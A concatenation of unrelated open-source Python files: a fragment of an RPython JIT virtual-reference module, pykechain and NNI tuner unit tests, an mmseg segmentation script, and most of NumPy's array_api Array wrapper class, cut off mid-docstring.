call" set. return True def continue_tracing(self, gcref, real_object): if not self.is_virtual_ref(gcref): return assert real_object vref = lltype.cast_opaque_ptr(lltype.Ptr(self.JIT_VIRTUAL_REF), gcref) assert vref.virtual_token != self.TOKEN_TRACING_RESCALL vref.virtual_token = self.TOKEN_NONE vref.forced = lltype.cast_opaque_ptr(rclass.OBJECTPTR, real_object) # ____________________________________________________________ def get_force_virtual_fnptr(self): # def force_virtual_if_necessary(inst): if not inst or inst.typeptr != self.jit_virtual_ref_vtable: return inst # common, fast case return self.force_virtual(inst) # FUNC = lltype.FuncType([rclass.OBJECTPTR], rclass.OBJECTPTR) funcptr = self.warmrunnerdesc.helper_func( lltype.Ptr(FUNC), force_virtual_if_necessary) return inputconst(lltype.typeOf(funcptr), funcptr) def get_is_virtual_fnptr(self): # def is_virtual(inst): if not inst: return False return inst.typeptr == self.jit_virtual_ref_vtable # FUNC = lltype.FuncType([rclass.OBJECTPTR], lltype.Bool) funcptr = self.warmrunnerdesc.helper_func(lltype.Ptr(FUNC), is_virtual) return inputconst(lltype.typeOf(funcptr), funcptr) def force_virtual(self, inst): vref = lltype.cast_pointer(lltype.Ptr(self.JIT_VIRTUAL_REF), inst) token = vref.virtual_token if token != self.TOKEN_NONE: if token == self.TOKEN_TRACING_RESCALL: # The "virtual" is not a virtual at all during tracing. # We only need to reset virtual_token to TOKEN_NONE # as a marker for the tracing, to tell it that this # "virtual" escapes. assert vref.forced vref.virtual_token = self.TOKEN_NONE else: assert not vref.forced from rpython.jit.metainterp.compile import ResumeGuardForcedDescr ResumeGuardForcedDescr.force_now(self.cpu, token) assert vref.virtual_token == self.TOKEN_NONE assert vref.forced elif not vref.forced: # token == TOKEN_NONE and the vref was not forced: it's invalid raise InvalidVirtualRef return vref.forced
the-stack_106_24398
from pykechain.enums import PropertyType, Multiplicity from pykechain.exceptions import IllegalArgumentError from pykechain.models import Part from pykechain.models.validators import RequiredFieldValidator from pykechain.utils import is_uuid from tests.classes import TestBetamax class TestPartCreateWithProperties(TestBetamax): def setUp(self): super().setUp() self.parent = self.project.part('Bike') # type: Part self.wheel_model = self.project.model('Wheel') # type: Part self.new_wheel = None def tearDown(self): if self.new_wheel: self.new_wheel.delete() super().tearDown() def test_create_part_with_properties_no_bulk(self): """Test create a part with the properties when bulk = False for old API compatibility""" update_dict = { 'Diameter': 42.42, 'Spokes': 42, 'Rim Material': 'Unobtanium' } self.new_wheel = self.parent.add_with_properties( self.wheel_model, "Fresh Wheel", update_dict=update_dict, bulk=False, ) self.assertIsInstance(self.new_wheel, Part) self.assertTrue(self.new_wheel.property('Diameter'), 42.42) def test_create_part_with_properties_names_with_bulk(self): """Test create a part with the properties when bulk = False for old API compatibility""" update_dict = { 'Diameter': 42.43, 'Spokes': 42, 'Rim Material': 'Unobtanium' } self.new_wheel = self.parent.add_with_properties( self.wheel_model, "Fresh Wheel", update_dict=update_dict, bulk=True, ) self.assertIsInstance(self.new_wheel, Part) self.assertTrue(self.new_wheel.property('Diameter'), 42.43) def test_create_part_with_properties_ids_with_bulk(self): """Test create a part with the properties when bulk = False for old API compatibility""" update_dict = { self.wheel_model.property('Diameter').id: 42.43, self.wheel_model.property('Spokes').id: 42, self.wheel_model.property('Rim Material').id: 'Unobtanium' } # check if the keys are really a UUID self.assertTrue(any([is_uuid(key) for key in update_dict.keys()])) self.new_wheel = self.parent.add_with_properties( self.wheel_model, "Fresh Wheel", update_dict=update_dict, bulk=True, ) self.assertIsInstance(self.new_wheel, Part) self.assertTrue(self.new_wheel.property('Diameter'), 42.43) class TestCreateModelWithProperties(TestBetamax): properties_fvalues = [ {"name": "char prop", "property_type": PropertyType.CHAR_VALUE}, {"name": "number prop", "property_type": PropertyType.FLOAT_VALUE, "value": 3.14}, {"name": "boolean_prop", "property_type": PropertyType.BOOLEAN_VALUE, "value": False, "value_options": {"validators": [RequiredFieldValidator().as_json()]}} ] def setUp(self): super().setUp() self.new_part = None def tearDown(self): if self.new_part is not None: self.new_part.delete() super().tearDown() def test_create_model_with_properties(self): parent = self.project.model(name__startswith='Catalog') new_model = self.project.create_model_with_properties( name='A new model', parent=parent.id, multiplicity=Multiplicity.ZERO_MANY, properties_fvalues=self.properties_fvalues, ) self.new_part = new_model self.assertEqual(3, len(new_model.properties)) self.assertEqual(new_model.property('number prop').value, 3.14) self.assertEqual(new_model.property('boolean_prop').value, False) self.assertTrue(new_model.property('boolean_prop')._options) def test_create_with_invalid_properties(self): parent = self.project.model(name__startswith='Catalog') with self.assertRaises(IllegalArgumentError): self.new_part = self.project.create_model_with_properties( name='A new model', parent=parent.id, multiplicity=Multiplicity.ZERO_MANY, properties_fvalues=[ {"property_type": PropertyType.CHAR_VALUE} ], )
the-stack_106_24399
#!/usr/bin/env python2 # coding:utf-8 import sys from mmseg import seg_txt for line in sys.stdin: blks = str.split(line) out_line = blks[0] for i in range(1, len(blks)): if blks[i] == "[VOCALIZED-NOISE]" or blks[i] == "[NOISE]" or blks[i] == "[LAUGHTER]": out_line += " " + blks[i] continue for j in seg_txt(blks[i]): out_line += " " + j print(out_line)
the-stack_106_24401
# Copyright (c) Microsoft Corporation. All rights reserved. # # MIT License # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and # associated documentation files (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, publish, distribute, # sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all copies or # substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT # NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT # OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # ================================================================================================== import glob import json import logging import os import shutil import sys from unittest import TestCase, main from nni.batch_tuner.batch_tuner import BatchTuner from nni.evolution_tuner.evolution_tuner import EvolutionTuner from nni.gp_tuner.gp_tuner import GPTuner from nni.gridsearch_tuner.gridsearch_tuner import GridSearchTuner from nni.hyperopt_tuner.hyperopt_tuner import HyperoptTuner from nni.metis_tuner.metis_tuner import MetisTuner try: from nni.smac_tuner.smac_tuner import SMACTuner except ImportError: assert sys.platform == "win32" from nni.tuner import Tuner logging.basicConfig(level=logging.INFO) logger = logging.getLogger('test_tuner') class TunerTestCase(TestCase): """ Targeted at testing functions of built-in tuners, including - [ ] load_checkpoint - [ ] save_checkpoint - [X] update_search_space - [X] generate_multiple_parameters - [ ] import_data - [ ] trial_end - [ ] receive_trial_result """ def search_space_test_one(self, tuner_factory, search_space): tuner = tuner_factory() self.assertIsInstance(tuner, Tuner) tuner.update_search_space(search_space) parameters = tuner.generate_multiple_parameters(list(range(0, 50))) logger.info(parameters) self.check_range(parameters, search_space) if not parameters: # TODO: not strict raise ValueError("No parameters generated") return parameters def check_range(self, generated_params, search_space): EPS = 1E-6 for param in generated_params: if self._testMethodName == "test_batch": param = {list(search_space.keys())[0]: param} for k, v in param.items(): if k.startswith("_mutable_layer"): _, block, layer, choice = k.split("/") cand = search_space[block]["_value"][layer].get(choice) # cand could be None, e.g., optional_inputs_chosen_state if choice == "layer_choice": self.assertIn(v, cand) if choice == "optional_input_size": if isinstance(cand, int): self.assertEqual(v, cand) else: self.assertGreaterEqual(v, cand[0]) self.assertLessEqual(v, cand[1]) if choice == "optional_inputs": pass # ignore for now continue item = search_space[k] if item["_type"] == "choice": self.assertIn(v, item["_value"]) if item["_type"] == "randint": self.assertIsInstance(v, int) if item["_type"] == "uniform": self.assertIsInstance(v, float) if item["_type"] in ("randint", "uniform", "quniform", "loguniform", "qloguniform"): self.assertGreaterEqual(v, 
item["_value"][0]) self.assertLessEqual(v, item["_value"][1]) if item["_type"].startswith("q"): multiple = v / item["_value"][2] print(k, v, multiple, item) if item["_value"][0] + EPS < v < item["_value"][1] - EPS: self.assertAlmostEqual(int(round(multiple)), multiple) if item["_type"] in ("qlognormal", "lognormal"): self.assertGreaterEqual(v, 0) if item["_type"] == "mutable_layer": for layer_name in item["_value"].keys(): self.assertIn(v[layer_name]["chosen_layer"], item["layer_choice"]) def search_space_test_all(self, tuner_factory, supported_types=None, ignore_types=None): # NOTE(yuge): ignore types # Supported types are listed in the table. They are meant to be supported and should be correct. # Other than those, all the rest are "unsupported", which are expected to produce ridiculous results # or throw some exceptions. However, there are certain types I can't check. For example, generate # "normal" using GP Tuner returns successfully and results are fine if we check the range (-inf to +inf), # but they make no sense: it's not a normal distribution. So they are ignored in tests for now. with open(os.path.join(os.path.dirname(__file__), "assets/search_space.json"), "r") as fp: search_space_all = json.load(fp) if supported_types is None: supported_types = ["choice", "randint", "uniform", "quniform", "loguniform", "qloguniform", "normal", "qnormal", "lognormal", "qlognormal"] full_supported_search_space = dict() for single in search_space_all: single_keyword = single.split("_") space = search_space_all[single] expected_fail = not any([t in single_keyword for t in supported_types]) or "fail" in single_keyword if ignore_types is not None and any([t in ignore_types for t in single_keyword]): continue if "fail" in space: if self._testMethodName.split("_", 1)[1] in space.pop("fail"): expected_fail = True single_search_space = {single: space} if not expected_fail: # supports this key self.search_space_test_one(tuner_factory, single_search_space) full_supported_search_space.update(single_search_space) else: # unsupported key with self.assertRaises(Exception, msg="Testing {}".format(single)) as cm: self.search_space_test_one(tuner_factory, single_search_space) logger.info("%s %s %s", tuner_factory, single, cm.exception) if not any(t in self._testMethodName for t in ["batch", "grid_search"]): # grid search fails for too many combinations logger.info("Full supported search space: %s", full_supported_search_space) self.search_space_test_one(tuner_factory, full_supported_search_space) def test_grid_search(self): self.search_space_test_all(lambda: GridSearchTuner(), supported_types=["choice", "randint", "quniform"]) def test_tpe(self): self.search_space_test_all(lambda: HyperoptTuner("tpe")) def test_random_search(self): self.search_space_test_all(lambda: HyperoptTuner("random_search")) def test_anneal(self): self.search_space_test_all(lambda: HyperoptTuner("anneal")) def test_smac(self): if sys.platform == "win32": return # smac doesn't work on windows self.search_space_test_all(lambda: SMACTuner(), supported_types=["choice", "randint", "uniform", "quniform", "loguniform"]) def test_batch(self): self.search_space_test_all(lambda: BatchTuner(), supported_types=["choice"]) def test_evolution(self): # Needs enough population size, otherwise it will throw a runtime error self.search_space_test_all(lambda: EvolutionTuner(population_size=100)) def test_gp(self): self.search_space_test_all(lambda: GPTuner(), supported_types=["choice", "randint", "uniform", "quniform", "loguniform", "qloguniform"], 
ignore_types=["normal", "lognormal", "qnormal", "qlognormal"]) def test_metis(self): self.search_space_test_all(lambda: MetisTuner(), supported_types=["choice", "randint", "uniform", "quniform"]) def test_networkmorphism(self): pass def test_ppo(self): pass def tearDown(self): file_list = glob.glob("smac3*") + ["param_config_space.pcs", "scenario.txt", "model_path"] for file in file_list: if os.path.exists(file): if os.path.isdir(file): shutil.rmtree(file) else: os.remove(file) if __name__ == '__main__': main()
the-stack_106_24404
""" Wrapper class around the ndarray object for the array API standard. The array API standard defines some behaviors differently than ndarray, in particular, type promotion rules are different (the standard has no value-based casting). The standard also specifies a more limited subset of array methods and functionalities than are implemented on ndarray. Since the goal of the array_api namespace is to be a minimal implementation of the array API standard, we need to define a separate wrapper class for the array_api namespace. The standard compliant class is only a wrapper class. It is *not* a subclass of ndarray. """ from __future__ import annotations import operator from enum import IntEnum from ._creation_functions import asarray from ._dtypes import ( _all_dtypes, _boolean_dtypes, _integer_dtypes, _integer_or_boolean_dtypes, _floating_dtypes, _numeric_dtypes, _result_type, _dtype_categories, ) from typing import TYPE_CHECKING, Optional, Tuple, Union, Any import types if TYPE_CHECKING: from ._typing import Any, PyCapsule, Device, Dtype import numpy.typing as npt import numpy as np from numpy import array_api class Array: """ n-d array object for the array API namespace. See the docstring of :py:obj:`np.ndarray <numpy.ndarray>` for more information. This is a wrapper around numpy.ndarray that restricts the usage to only those things that are required by the array API namespace. Note, attributes on this object that start with a single underscore are not part of the API specification and should only be used internally. This object should not be constructed directly. Rather, use one of the creation functions, such as asarray(). """ _array: np.ndarray # Use a custom constructor instead of __init__, as manually initializing # this class is not supported API. @classmethod def _new(cls, x, /): """ This is a private method for initializing the array API Array object. Functions outside of the array_api submodule should not use this method. Use one of the creation functions instead, such as ``asarray``. """ obj = super().__new__(cls) # Note: The spec does not have array scalars, only 0-D arrays. if isinstance(x, np.generic): # Convert the array scalar to a 0-D array x = np.asarray(x) if x.dtype not in _all_dtypes: raise TypeError( f"The array_api namespace does not support the dtype '{x.dtype}'" ) obj._array = x return obj # Prevent Array() from working def __new__(cls, *args, **kwargs): raise TypeError( "The array_api Array object should not be instantiated directly. Use an array creation function, such as asarray(), instead." ) # These functions are not required by the spec, but are implemented for # the sake of usability. def __str__(self: Array, /) -> str: """ Performs the operation __str__. """ return self._array.__str__().replace("array", "Array") def __repr__(self: Array, /) -> str: """ Performs the operation __repr__. """ suffix = f", dtype={self.dtype.name})" if 0 in self.shape: prefix = "empty(" mid = str(self.shape) else: prefix = "Array(" mid = np.array2string(self._array, separator=', ', prefix=prefix, suffix=suffix) return prefix + mid + suffix # This function is not required by the spec, but we implement it here for # convenience so that np.asarray(np.array_api.Array) will work. def __array__(self, dtype: None | np.dtype[Any] = None) -> npt.NDArray[Any]: """ Warning: this method is NOT part of the array API spec. Implementers of other libraries need not include it, and users should not assume it will be present in other implementations. 
""" return np.asarray(self._array, dtype=dtype) # These are various helper functions to make the array behavior match the # spec in places where it either deviates from or is more strict than # NumPy behavior def _check_allowed_dtypes(self, other: bool | int | float | Array, dtype_category: str, op: str) -> Array: """ Helper function for operators to only allow specific input dtypes Use like other = self._check_allowed_dtypes(other, 'numeric', '__add__') if other is NotImplemented: return other """ if self.dtype not in _dtype_categories[dtype_category]: raise TypeError(f"Only {dtype_category} dtypes are allowed in {op}") if isinstance(other, (int, float, bool)): other = self._promote_scalar(other) elif isinstance(other, Array): if other.dtype not in _dtype_categories[dtype_category]: raise TypeError(f"Only {dtype_category} dtypes are allowed in {op}") else: return NotImplemented # This will raise TypeError for type combinations that are not allowed # to promote in the spec (even if the NumPy array operator would # promote them). res_dtype = _result_type(self.dtype, other.dtype) if op.startswith("__i"): # Note: NumPy will allow in-place operators in some cases where # the type promoted operator does not match the left-hand side # operand. For example, # >>> a = np.array(1, dtype=np.int8) # >>> a += np.array(1, dtype=np.int16) # The spec explicitly disallows this. if res_dtype != self.dtype: raise TypeError( f"Cannot perform {op} with dtypes {self.dtype} and {other.dtype}" ) return other # Helper function to match the type promotion rules in the spec def _promote_scalar(self, scalar): """ Returns a promoted version of a Python scalar appropriate for use with operations on self. This may raise an OverflowError in cases where the scalar is an integer that is too large to fit in a NumPy integer dtype, or TypeError when the scalar type is incompatible with the dtype of self. """ if isinstance(scalar, bool): if self.dtype not in _boolean_dtypes: raise TypeError( "Python bool scalars can only be promoted with bool arrays" ) elif isinstance(scalar, int): if self.dtype in _boolean_dtypes: raise TypeError( "Python int scalars cannot be promoted with bool arrays" ) elif isinstance(scalar, float): if self.dtype not in _floating_dtypes: raise TypeError( "Python float scalars can only be promoted with floating-point arrays." ) else: raise TypeError("'scalar' must be a Python scalar") # Note: the spec only specifies integer-dtype/int promotion # behavior for integers within the bounds of the integer dtype. # Outside of those bounds we use the default NumPy behavior (either # cast or raise OverflowError). return Array._new(np.array(scalar, self.dtype)) @staticmethod def _normalize_two_args(x1, x2) -> Tuple[Array, Array]: """ Normalize inputs to two arg functions to fix type promotion rules NumPy deviates from the spec type promotion rules in cases where one argument is 0-dimensional and the other is not. For example: >>> import numpy as np >>> a = np.array([1.0], dtype=np.float32) >>> b = np.array(1.0, dtype=np.float64) >>> np.add(a, b) # The spec says this should be float64 array([2.], dtype=float32) To fix this, we add a dimension to the 0-dimension array before passing it through. This works because a dimension would be added anyway from broadcasting, so the resulting shape is the same, but this prevents NumPy from not promoting the dtype. 
""" # Another option would be to use signature=(x1.dtype, x2.dtype, None), # but that only works for ufuncs, so we would have to call the ufuncs # directly in the operator methods. One should also note that this # sort of trick wouldn't work for functions like searchsorted, which # don't do normal broadcasting, but there aren't any functions like # that in the array API namespace. if x1.ndim == 0 and x2.ndim != 0: # The _array[None] workaround was chosen because it is relatively # performant. broadcast_to(x1._array, x2.shape) is much slower. We # could also manually type promote x2, but that is more complicated # and about the same performance as this. x1 = Array._new(x1._array[None]) elif x2.ndim == 0 and x1.ndim != 0: x2 = Array._new(x2._array[None]) return (x1, x2) # Note: A large fraction of allowed indices are disallowed here (see the # docstring below) @staticmethod def _validate_index(key, shape): """ Validate an index according to the array API. The array API specification only requires a subset of indices that are supported by NumPy. This function will reject any index that is allowed by NumPy but not required by the array API specification. We always raise ``IndexError`` on such indices (the spec does not require any specific behavior on them, but this makes the NumPy array API namespace a minimal implementation of the spec). See https://data-apis.org/array-api/latest/API_specification/indexing.html for the full list of required indexing behavior This function either raises IndexError if the index ``key`` is invalid, or a new key to be used in place of ``key`` in indexing. It only raises ``IndexError`` on indices that are not already rejected by NumPy, as NumPy will already raise the appropriate error on such indices. ``shape`` may be None, in which case, only cases that are independent of the array shape are checked. The following cases are allowed by NumPy, but not specified by the array API specification: - Indices to not include an implicit ellipsis at the end. That is, every axis of an array must be explicitly indexed or an ellipsis included. - The start and stop of a slice may not be out of bounds. In particular, for a slice ``i:j:k`` on an axis of size ``n``, only the following are allowed: - ``i`` or ``j`` omitted (``None``). - ``-n <= i <= max(0, n - 1)``. - For ``k > 0`` or ``k`` omitted (``None``), ``-n <= j <= n``. - For ``k < 0``, ``-n - 1 <= j <= max(0, n - 1)``. - Boolean array indices are not allowed as part of a larger tuple index. - Integer array indices are not allowed (with the exception of 0-D arrays, which are treated the same as scalars). Additionally, it should be noted that indices that would return a scalar in NumPy will return a 0-D array. Array scalars are not allowed in the specification, only 0-D arrays. This is done in the ``Array._new`` constructor, not this function. """ if isinstance(key, slice): if shape is None: return key if shape == (): return key if len(shape) > 1: raise IndexError( "Multidimensional arrays must include an index for every axis or use an ellipsis" ) size = shape[0] # Ensure invalid slice entries are passed through. 
if key.start is not None: try: operator.index(key.start) except TypeError: return key if not (-size <= key.start <= size): raise IndexError( "Slices with out-of-bounds start are not allowed in the array API namespace" ) if key.stop is not None: try: operator.index(key.stop) except TypeError: return key step = 1 if key.step is None else key.step if (step > 0 and not (-size <= key.stop <= size) or step < 0 and not (-size - 1 <= key.stop <= max(0, size - 1))): raise IndexError("Slices with out-of-bounds stop are not allowed in the array API namespace") return key elif isinstance(key, tuple): key = tuple(Array._validate_index(idx, None) for idx in key) for idx in key: if ( isinstance(idx, np.ndarray) and idx.dtype in _boolean_dtypes or isinstance(idx, (bool, np.bool_)) ): if len(key) == 1: return key raise IndexError( "Boolean array indices combined with other indices are not allowed in the array API namespace" ) if isinstance(idx, tuple): raise IndexError( "Nested tuple indices are not allowed in the array API namespace" ) if shape is None: return key n_ellipsis = key.count(...) if n_ellipsis > 1: return key ellipsis_i = key.index(...) if n_ellipsis else len(key) for idx, size in list(zip(key[:ellipsis_i], shape)) + list( zip(key[:ellipsis_i:-1], shape[:ellipsis_i:-1]) ): Array._validate_index(idx, (size,)) if n_ellipsis == 0 and len(key) < len(shape): raise IndexError( "Multidimensional arrays must include an index for every axis or use an ellipsis" ) return key elif isinstance(key, bool): return key elif isinstance(key, Array): if key.dtype in _integer_dtypes: if key.ndim != 0: raise IndexError( "Non-zero dimensional integer array indices are not allowed in the array API namespace" ) return key._array elif key is Ellipsis: return key elif key is None: raise IndexError( "newaxis indices are not allowed in the array API namespace" ) try: key = operator.index(key) if shape is not None and len(shape) > 1: raise IndexError( "Multidimensional arrays must include an index for every axis or use an ellipsis" ) return key except TypeError: # Note: This also omits boolean arrays that are not already in # Array() form, like a list of booleans. raise IndexError( "Only integers, slices (`:`), ellipsis (`...`), and boolean arrays are valid indices in the array API namespace" ) # Everything below this line is required by the spec. def __abs__(self: Array, /) -> Array: """ Performs the operation __abs__. """ if self.dtype not in _numeric_dtypes: raise TypeError("Only numeric dtypes are allowed in __abs__") res = self._array.__abs__() return self.__class__._new(res) def __add__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __add__. """ other = self._check_allowed_dtypes(other, "numeric", "__add__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__add__(other._array) return self.__class__._new(res) def __and__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __and__. 
""" other = self._check_allowed_dtypes(other, "integer or boolean", "__and__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__and__(other._array) return self.__class__._new(res) def __array_namespace__( self: Array, /, *, api_version: Optional[str] = None ) -> types.ModuleType: if api_version is not None and not api_version.startswith("2021."): raise ValueError(f"Unrecognized array API version: {api_version!r}") return array_api def __bool__(self: Array, /) -> bool: """ Performs the operation __bool__. """ # Note: This is an error here. if self._array.ndim != 0: raise TypeError("bool is only allowed on arrays with 0 dimensions") if self.dtype not in _boolean_dtypes: raise ValueError("bool is only allowed on boolean arrays") res = self._array.__bool__() return res def __dlpack__(self: Array, /, *, stream: None = None) -> PyCapsule: """ Performs the operation __dlpack__. """ return self._array.__dlpack__(stream=stream) def __dlpack_device__(self: Array, /) -> Tuple[IntEnum, int]: """ Performs the operation __dlpack_device__. """ # Note: device support is required for this return self._array.__dlpack_device__() def __eq__(self: Array, other: Union[int, float, bool, Array], /) -> Array: """ Performs the operation __eq__. """ # Even though "all" dtypes are allowed, we still require them to be # promotable with each other. other = self._check_allowed_dtypes(other, "all", "__eq__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__eq__(other._array) return self.__class__._new(res) def __float__(self: Array, /) -> float: """ Performs the operation __float__. """ # Note: This is an error here. if self._array.ndim != 0: raise TypeError("float is only allowed on arrays with 0 dimensions") if self.dtype not in _floating_dtypes: raise ValueError("float is only allowed on floating-point arrays") res = self._array.__float__() return res def __floordiv__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __floordiv__. """ other = self._check_allowed_dtypes(other, "numeric", "__floordiv__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__floordiv__(other._array) return self.__class__._new(res) def __ge__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __ge__. """ other = self._check_allowed_dtypes(other, "numeric", "__ge__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__ge__(other._array) return self.__class__._new(res) def __getitem__( self: Array, key: Union[ int, slice, ellipsis, Tuple[Union[int, slice, ellipsis], ...], Array ], /, ) -> Array: """ Performs the operation __getitem__. """ # Note: Only indices required by the spec are allowed. See the # docstring of _validate_index key = self._validate_index(key, self.shape) res = self._array.__getitem__(key) return self._new(res) def __gt__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __gt__. """ other = self._check_allowed_dtypes(other, "numeric", "__gt__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__gt__(other._array) return self.__class__._new(res) def __int__(self: Array, /) -> int: """ Performs the operation __int__. """ # Note: This is an error here. 
if self._array.ndim != 0: raise TypeError("int is only allowed on arrays with 0 dimensions") if self.dtype not in _integer_dtypes: raise ValueError("int is only allowed on integer arrays") res = self._array.__int__() return res def __index__(self: Array, /) -> int: """ Performs the operation __index__. """ res = self._array.__index__() return res def __invert__(self: Array, /) -> Array: """ Performs the operation __invert__. """ if self.dtype not in _integer_or_boolean_dtypes: raise TypeError("Only integer or boolean dtypes are allowed in __invert__") res = self._array.__invert__() return self.__class__._new(res) def __le__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __le__. """ other = self._check_allowed_dtypes(other, "numeric", "__le__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__le__(other._array) return self.__class__._new(res) def __lshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __lshift__. """ other = self._check_allowed_dtypes(other, "integer", "__lshift__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__lshift__(other._array) return self.__class__._new(res) def __lt__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __lt__. """ other = self._check_allowed_dtypes(other, "numeric", "__lt__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__lt__(other._array) return self.__class__._new(res) def __matmul__(self: Array, other: Array, /) -> Array: """ Performs the operation __matmul__. """ # matmul is not defined for scalars, but without this, we may get # the wrong error message from asarray. other = self._check_allowed_dtypes(other, "numeric", "__matmul__") if other is NotImplemented: return other res = self._array.__matmul__(other._array) return self.__class__._new(res) def __mod__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __mod__. """ other = self._check_allowed_dtypes(other, "numeric", "__mod__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__mod__(other._array) return self.__class__._new(res) def __mul__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __mul__. """ other = self._check_allowed_dtypes(other, "numeric", "__mul__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__mul__(other._array) return self.__class__._new(res) def __ne__(self: Array, other: Union[int, float, bool, Array], /) -> Array: """ Performs the operation __ne__. """ other = self._check_allowed_dtypes(other, "all", "__ne__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__ne__(other._array) return self.__class__._new(res) def __neg__(self: Array, /) -> Array: """ Performs the operation __neg__. """ if self.dtype not in _numeric_dtypes: raise TypeError("Only numeric dtypes are allowed in __neg__") res = self._array.__neg__() return self.__class__._new(res) def __or__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __or__. 
""" other = self._check_allowed_dtypes(other, "integer or boolean", "__or__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__or__(other._array) return self.__class__._new(res) def __pos__(self: Array, /) -> Array: """ Performs the operation __pos__. """ if self.dtype not in _numeric_dtypes: raise TypeError("Only numeric dtypes are allowed in __pos__") res = self._array.__pos__() return self.__class__._new(res) # PEP 484 requires int to be a subtype of float, but __pow__ should not # accept int. def __pow__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __pow__. """ from ._elementwise_functions import pow other = self._check_allowed_dtypes(other, "floating-point", "__pow__") if other is NotImplemented: return other # Note: NumPy's __pow__ does not follow type promotion rules for 0-d # arrays, so we use pow() here instead. return pow(self, other) def __rshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __rshift__. """ other = self._check_allowed_dtypes(other, "integer", "__rshift__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rshift__(other._array) return self.__class__._new(res) def __setitem__( self, key: Union[ int, slice, ellipsis, Tuple[Union[int, slice, ellipsis], ...], Array ], value: Union[int, float, bool, Array], /, ) -> None: """ Performs the operation __setitem__. """ # Note: Only indices required by the spec are allowed. See the # docstring of _validate_index key = self._validate_index(key, self.shape) self._array.__setitem__(key, asarray(value)._array) def __sub__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __sub__. """ other = self._check_allowed_dtypes(other, "numeric", "__sub__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__sub__(other._array) return self.__class__._new(res) # PEP 484 requires int to be a subtype of float, but __truediv__ should # not accept int. def __truediv__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __truediv__. """ other = self._check_allowed_dtypes(other, "floating-point", "__truediv__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__truediv__(other._array) return self.__class__._new(res) def __xor__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __xor__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__xor__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__xor__(other._array) return self.__class__._new(res) def __iadd__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __iadd__. """ other = self._check_allowed_dtypes(other, "numeric", "__iadd__") if other is NotImplemented: return other self._array.__iadd__(other._array) return self def __radd__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __radd__. """ other = self._check_allowed_dtypes(other, "numeric", "__radd__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__radd__(other._array) return self.__class__._new(res) def __iand__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __iand__. 
""" other = self._check_allowed_dtypes(other, "integer or boolean", "__iand__") if other is NotImplemented: return other self._array.__iand__(other._array) return self def __rand__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __rand__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__rand__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rand__(other._array) return self.__class__._new(res) def __ifloordiv__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __ifloordiv__. """ other = self._check_allowed_dtypes(other, "numeric", "__ifloordiv__") if other is NotImplemented: return other self._array.__ifloordiv__(other._array) return self def __rfloordiv__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __rfloordiv__. """ other = self._check_allowed_dtypes(other, "numeric", "__rfloordiv__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rfloordiv__(other._array) return self.__class__._new(res) def __ilshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __ilshift__. """ other = self._check_allowed_dtypes(other, "integer", "__ilshift__") if other is NotImplemented: return other self._array.__ilshift__(other._array) return self def __rlshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs 